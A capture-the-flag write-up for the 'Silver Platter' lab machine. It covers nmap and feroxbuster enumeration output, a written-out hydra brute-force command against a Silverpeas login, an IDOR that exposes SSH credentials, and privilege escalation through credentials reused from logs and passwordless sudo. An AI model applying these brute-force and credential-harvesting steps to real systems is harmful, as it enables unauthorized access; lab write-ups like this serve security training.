Silver Platter

Can you breach the server?

Recon

We start with an Nmap scan and find three open ports. Port 22 on which we have SSH available, port 80 to an nginx web server and port 8080 to another web server.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80,8080 silverplatter.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 12:26 IST
Nmap scan report for silverplatter.thm (10.10.232.52)
Host is up (0.15s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 1b:1c:87:8a:fe:34:16:c9:f7:82:37:2b:10:8f:8b:f1 (ECDSA)
|_  256 26:6d:17:ed:83:9e:4f:2d:f6:cd:53:17:c8:80:3d:09 (ED25519)
80/tcp   open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Hack Smarter Security
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http-proxy
|_http-title: Error
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Mon, 17 Feb 2025 06:56:38 GMT
|     <html><head><title>Error</title></head><body>404 - Not Found</body></html>
|   GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SMBProgNeg, SSLSessionReq, Socks5, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Length: 0
|     Connection: close
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 404 Not Found
|     Connection: close
|     Content-Length: 74
|     Content-Type: text/html
|     Date: Mon, 17 Feb 2025 06:56:37 GMT
|_    <html><head><title>Error</title></head><body>404 - Not Found</body></html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.94SVN%I=7%D=2/17%Time=67B2DDA4%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,C9,"HTTP/1\.1\x20404\x20Not\x20Found\r\nConnection:\x20clos
.............
SF:n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.34 seconds

While enumerating directories with Feroxbuster on the web server running on port 80, we did not discover any notable or useful results.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u 'http://silverplatter.thm/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
                                                                                                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://silverplatter.thm/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       12w      178c http://silverplatter.thm/images => http://silverplatter.thm/images/
200      GET      137l      408w    15151c http://silverplatter.thm/images/pic03.jpg
200      GET        2l       52w     2051c http://silverplatter.thm/assets/js/browser.min.js
200      GET      587l     1232w    12433c http://silverplatter.thm/assets/js/util.js
200      GET      401l      738w     8435c http://silverplatter.thm/assets/js/main.js
200      GET        2l       87w     2439c http://silverplatter.thm/assets/js/breakpoints.min.js
200      GET       37l       80w      572c http://silverplatter.thm/assets/css/noscript.css
200      GET     1657l     3577w    34353c http://silverplatter.thm/assets/css/main.css
200      GET        2l     1294w    89501c http://silverplatter.thm/assets/js/jquery.min.js
403      GET        7l       10w      162c http://silverplatter.thm/assets/
403      GET        7l       10w      162c http://silverplatter.thm/assets/js/
403      GET        7l       10w      162c http://silverplatter.thm/assets/css/
301      GET        7l       12w      178c http://silverplatter.thm/assets => http://silverplatter.thm/assets/
200      GET     3507l    19364w  1579223c http://silverplatter.thm/images/pic02.jpg
200      GET     8018l    46906w  3648400c http://silverplatter.thm/images/pic01.jpg
200      GET      345l     1180w    14124c http://silverplatter.thm/
301      GET        7l       12w      178c http://silverplatter.thm/assets/css => http://silverplatter.thm/assets/css/
301      GET        7l       12w      178c http://silverplatter.thm/assets/js => http://silverplatter.thm/assets/js/
[###>----------------] - 2m    185329/1038159 8m      found:18      errors:0      
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass => http://silverplatter.thm/assets/sass/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/layout => http://silverplatter.thm/assets/sass/layout/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/components => http://silverplatter.thm/assets/sass/components/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/base => http://silverplatter.thm/assets/sass/base/
301      GET        7l       12w      178c http://silverplatter.thm/assets/sass/libs => http://silverplatter.thm/assets/sass/libs/
[##################>-] - 14m  1902644/2076304 0s      found:23      errors:3      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_silverplatter_thm_-1739777048.state ...
[##################>-] - 14m  1902688/2076304 0s      found:23      errors:3      
[####################] - 12m   207629/207629  293/s   http://silverplatter.thm/ 

On the web server running on port 8080, we discover two directories: /website and /console. Both seem intriguing, but /console redirects to a static nodirect.html page, and /website redirects to /website/, which is restricted with a "Forbidden" error.

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u 'http://silverplatter.thm:8080/' -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 
                                                                                                                                                                                                                                           
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://silverplatter.thm:8080/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        1l        4w       74c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://silverplatter.thm:8080/website => http://silverplatter.thm:8080/website/
404      GET        1l        2w       68c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302      GET        0l        0w        0c http://silverplatter.thm:8080/console => http://silverplatter.thm:8080/noredirect.html
[####################] - 12m   415258/415258  0s      found:2       errors:0      
[####################] - 12m   207629/207629  297/s   http://silverplatter.thm:8080/ 
[####################] - 12m   207629/207629  297/s   http://silverplatter.thm:8080/website/  

We look at the page manually on port 80.

Under the Contact section, we identify a potential user listed as the project manager for Silverpeas.

On the website on port 8080 we find nothing on the index page and /website redirects us to /website/, which is forbidden.

Multiple 403 bypass techniques and automated scripts proved ineffective. Given the username and a hint of potential brute-forcing in the room description, we attempted basic authentication brute-forcing using Hydra, but this also failed.

Initial Access

However, the contact form reference to Silverpeas proves useful. Entering it as a directory at http://silverplatter.thm:8080/ results in a hit—a Silverpeas login page. While there are known CVEs for Silverpeas, they are not required for this challenge.

http://silverplatter.thm:8080/silverpeas

Now we capture a log in request to craft our hydra command.

We forward the intercepted login request to capture the server's invalid response message, which can help us identify any clues or patterns to fine-tune our brute-force attack.

hydra -l scr1ptkiddy -P passwords.txt silverplatter.thm -s 8080 http-post-form "/silverpeas/AuthenticationServlet:Login=^USER^&Password=^PASS^&DomainId=0:F=Login or password incorrect"

We are able to log in as scr1ptkiddy at Silverpeas.

After logging in as scr1ptkiddy, we notice a single notification displayed on the dashboard.

In the personal workspace, we can inspect our notifications.

Shell as Tim

We intercept the request of inspecting the message and see that an ID is queried, here ID 5.

Upon discovering an IDOR (Insecure Direct Object Reference), we exploit it to inspect the messages of other users. In particular, we find that the message with ID 6 contains the SSH credentials for the user tim.

Next, we use those credentials to log in via SSH.

We find the user flag in the home directory of the user tim.

Privilege Escalation

By examining Tim's group memberships, we find that he is part of the adm group, which grants him access to view logs located in /var/logs. This could potentially contain sensitive information that might help us escalate privileges further.

There is also the user tyler.

Shell as Tyler

So lets search for entries of the user tyler.

And we do find some database credentials. Maybe they are reused.

We successfully switched to the user tyler using those credentials.

The user is granted permission to run any command as root without a password. We use sudo su to switch to root, navigate to the root directory, and find the final flag.

Last updated

Was this helpful?